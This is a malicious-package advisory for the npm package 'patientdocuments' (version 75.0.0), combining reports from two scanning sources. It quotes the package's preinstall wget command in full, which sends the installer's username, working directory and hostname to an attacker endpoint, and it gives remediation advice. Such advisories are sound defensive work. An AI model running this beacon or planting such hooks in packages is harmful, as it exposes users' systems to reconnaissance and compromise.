npm · Malicious package advisory
Malwarepatientdocuments
MAL-2026-5752
Malicious code in patientdocuments (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (56c5ab4dc6470deaebe29f4851edb91bc5d5704e9f9578a91e238490708c007b) package.json declares a preinstall lifecycle script that runs `wget --quiet "http://orwa-orwa.dev-node-lap.workers.dev/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"`, firing automatically on `npm install`. The script leaks the installer's OS username, current working directory, and hostname to an attacker-controlled Cloudflare Workers endpoint over plain HTTP. The same beacon is duplicated in the `test` and `preupdate` scripts. The package ships no library code (no main module shipped), so its sole effect is the recon beacon. `unsafe-perm` is set, ensuring execution as root in privileged install contexts. This is a dependency-confusion / recon-beacon pattern: identity exfiltration with no legitimate purpose tied to the package's advertised function. ## Source: ghsa-malware (bfe139b8a3698f008a12823f07e15534fd8529c0eb8efc11df79dc6670271991) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Compromised versions (1)
- 75.0.0
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.